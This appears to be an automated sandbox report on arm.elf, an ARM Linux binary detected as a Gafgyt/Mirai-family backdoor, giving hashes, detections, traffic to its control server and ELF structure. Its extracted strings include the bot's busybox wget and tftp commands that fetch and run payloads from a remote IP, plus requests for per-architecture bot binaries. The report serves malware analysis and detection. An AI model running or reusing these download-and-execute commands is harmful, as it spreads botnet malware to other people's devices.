Linux Analysis Report
arm.elf

Overview

General Information

Sample name:arm.elf
Analysis ID:1559718
MD5:3f45dc3fdc50d2412dd299a4190fcccc
SHA1:fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
SHA256:0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
Tags:elf, user-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1559718
Start date and time:2024-11-20 21:07:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.elf
Detection:MAL
Classification:mal48.linELF@0/0@2/0
  • VT rate limit hit for: arm.elf
Command:/tmp/arm.elf
PID:5428
Exit Code:1
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5416, Parent: 3583)
  • rm (PID: 5416, Parent: 3583, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
  • dash New Fork (PID: 5417, Parent: 3583)
  • rm (PID: 5417, Parent: 3583, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
  • arm.elf (PID: 5428, Parent: 5349, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.elf
    • arm.elf New Fork (PID: 5430, Parent: 5428)
  • cleanup
No yara matches
No Suricata rule has matched


AV Detection

Source: arm.elf, ReversingLabs: Detection: 42%
Source: global traffic, TCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685
Source: unknown, TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: arm.elf, String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: arm.elf, String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: global traffic, DNS traffic detected: DNS query: daisy.ubuntu.com
Source: arm.elf, String found in binary or memory: http://87.120.116.226
Source: arm.elf, String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: arm.elf, String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: Initial sample, String containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sample, String containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sample, String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample, String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sample, String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sample, String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample, String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample, String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample, String containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sample, String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sample, String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample, String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial sample, Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.x86 HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.mips HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.sparc HTTP/1.0
Source: Initial sample, Potential command found: GET /fbot.sh4 HTTP/1.0
Source: ELF static info symbol of initial sample, .symtab present: no
Source: classification engine, Classification label: mal48.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5416), Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
Source: /usr/bin/dash (PID: 5417), Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
Source: /tmp/arm.elf (PID: 5428), Queries kernel information via 'uname':
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp, Binary or memory string: R |U!/etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp, Binary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp, Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp, Binary or memory string: /usr/bin/qemu-arm
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: 1 Command and Scripting Interpreter; Scheduled Task/Job; At
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: 1 File Deletion; Rootkit; Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: 11 Security Software Discovery; Application Window Discovery; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Command and Control: 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact
No configs have been found
[Behavior graph, ID: 1559718. Sample: arm.elf; Startdate: 20/11/2024; Architecture: LINUX; Score: 48. Process nodes: dash, rm, arm.elf (started); dash, rm (started); arm.elf (started). Network nodes: 85.239.34.134 (ports 46006, 7685; RAINBOW-HKRainbownetworklimitedHK, Russian Federation); daisy.ubuntu.com. Signature: Multi AV Scanner detection for submitted file.]
Source | Detection | Scanner | Label | Link
arm.elf | 42% | ReversingLabs | Linux.Backdoor.Gafgyt |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ | arm.elf | false | | high
http://87.120.116.226 | arm.elf | false | | unknown
https://www.youtube.ru/watch?v=OGp9P6QvMjY | arm.elf | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
85.239.34.134 | unknown | Russian Federation | | 134121 | RAINBOW-HKRainbownetworklimitedHK | false
Match | Associated Sample Name / URL | Detection | Threat Name
85.239.34.134 | arm5.elf | malicious | Unknown
85.239.34.134 | mpsl.elf | malicious | Unknown
85.239.34.134 | ppc.elf | malicious | Unknown
85.239.34.134 | arm6.elf | malicious | Unknown
85.239.34.134 | x86-20241120-0553.elf | malicious | Unknown
85.239.34.134 | test.elf | malicious | Unknown
85.239.34.134 | bin.i586.elf | malicious | Gafgyt, Mirai
85.239.34.134 | bin.i686.elf | malicious | Gafgyt, Mirai
85.239.34.134 | bin.armv7l.elf | malicious | Mirai
85.239.34.134 | bin.i686.elf | malicious | Gafgyt, Mirai
Match | Associated Sample Name / URL | Detection | Threat Name | Context
daisy.ubuntu.com | mpsl.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | arm6.elf | malicious | Mirai | 162.213.35.25
daisy.ubuntu.com | arm7.elf | malicious | Mirai | 162.213.35.25
daisy.ubuntu.com | newmain.elf | malicious | ConnectBack | 162.213.35.25
daisy.ubuntu.com | la.bot.mips.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | la.bot.arm.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | la.bot.powerpc.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | wheiuwa4.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | m68k.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | dvwkja7.elf | malicious | Mirai | 162.213.35.24
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAINBOW-HKRainbownetworklimitedHK | arm5.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | mpsl.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | ppc.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | arm6.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | x86-20241120-0553.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | setup.msi | malicious | ScreenConnect Tool | 85.239.34.190
RAINBOW-HKRainbownetworklimitedHK | uspr2uHV0H.ps1 | malicious | Unknown | 85.239.61.60
RAINBOW-HKRainbownetworklimitedHK | test.elf | malicious | Unknown | 85.239.34.134
RAINBOW-HKRainbownetworklimitedHK | la.bot.m68k.elf | malicious | Unknown | 24.233.26.195
RAINBOW-HKRainbownetworklimitedHK | bin.i586.elf | malicious | Gafgyt, Mirai | 85.239.34.134
                              No context
                              No context
                              No created / dropped files found
                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                              Entropy (8bit):6.1039061278492985
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:arm.elf
                              File size:80'480 bytes
                              MD5:3f45dc3fdc50d2412dd299a4190fcccc
                              SHA1:fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
                              SHA256:0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
                              SHA512:c1cacb5970083c8830d5199b098bfbc82a02efb5ed43740dab10d5c697fd695076b6a0b337e2d32e29643bb286adebf668a0e3fff2cd42d07c1c61506a68037a
                              SSDEEP:1536:keuZSI1H5DBavNs9VVh1FDeOhGKVDSVuHJvchh:c1avu7D1FDeOh5VDSVwchh
                              TLSH:DF734B46F8C19A52C6D195B6FB1E028E332653A8C1EF730799396F213BCF8961E3B544
                              File Content Preview:.ELF...a..........(.........4...X8......4. ...(......................5...5...............5..........D....&..........Q.td..................................-...L."....=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:ARM
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:ARM - ABI
                              ABI Version:0
                              Entry Point Address:0x8190
                              Flags:0x202
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:79960
                              Section Header Size:40
                              Number of Section Headers:13
                              Header String Table Index:12
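Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.init | PROGBITS | 0x8094 | 0x94 | 0x18 | 0x0 | 0x6 | AX | 0 | 0 | 4
.text | PROGBITS | 0x80b0 | 0xb0 | 0xf698 | 0x0 | 0x6 | AX | 0 | 0 | 16
.fini | PROGBITS | 0x17748 | 0xf748 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4
.rodata | PROGBITS | 0x1775c | 0xf75c | 0x3e48 | 0x0 | 0x2 | A | 0 | 0 | 4
.eh_frame | PROGBITS | 0x1c5a4 | 0x135a4 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.ctors | PROGBITS | 0x1c5a8 | 0x135a8 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x1c5b0 | 0x135b0 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.jcr | PROGBITS | 0x1c5b8 | 0x135b8 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x1c5bc | 0x135bc | 0x22c | 0x0 | 0x3 | WA | 0 | 0 | 4
.bss | NOBITS | 0x1c7e8 | 0x137e8 | 0x245c | 0x0 | 0x3 | WA | 0 | 0 | 4
.ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x137e8 | 0x10 | 0x0 | 0x0 | | 0 | 0 | 1
.shstrtab | STRTAB | 0x0 | 0x137f8 | 0x5d | 0x0 | 0x0 | | 0 | 0 | 1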
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x8000 | 0x8000 | 0x135a4 | 0x135a4 | 6.1335 | 0x5 | R E | 0x1000 | | .init .text .fini .rodata
LOAD | 0x135a4 | 0x1c5a4 | 0x1c5a4 | 0x244 | 0x26a0 | 2.3511 | 0x6 | RW | 0x1000 | | .eh_frame .ctors .dtors .jcr .data .bss
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 21:07:55.350924015 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:55.470731020 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:55.470796108 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:55.471731901 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:55.591468096 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891577959 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891618013 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891638041 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891654968 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891671896 CET | 7685 | 46006 | 85.239.34.134 | 192.168.2.13
Nov 20, 2024 21:07:56.891930103 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:56.891930103 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:56.891930103 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:56.891930103 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Nov 20, 2024 21:07:56.892673016 CET | 46006 | 7685 | 192.168.2.13 | 85.239.34.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 21:10:41.138885975 CET | 38155 | 53 | 192.168.2.13 | 1.1.1.1
Nov 20, 2024 21:10:41.138952971 CET | 45681 | 53 | 192.168.2.13 | 1.1.1.1
Nov 20, 2024 21:10:41.362469912 CET | 53 | 38155 | 1.1.1.1 | 192.168.2.13
Nov 20, 2024 21:10:41.392388105 CET | 53 | 45681 | 1.1.1.1 | 192.168.2.13
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 21:10:41.138885975 CET | 192.168.2.13 | 1.1.1.1 | 0x6a45 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:41.138952971 CET | 192.168.2.13 | 1.1.1.1 | 0xd8e2 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 21:10:41.362469912 CET | 1.1.1.1 | 192.168.2.13 | 0x6a45 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 21:10:41.362469912 CET | 1.1.1.1 | 192.168.2.13 | 0x6a45 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false

                              System Behavior

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):20:07:54
                              Start date (UTC):20/11/2024
                              Path:/tmp/arm.elf
                              Arguments:/tmp/arm.elf
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):20:07:54
                              Start date (UTC):20/11/2024
                              Path:/tmp/arm.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1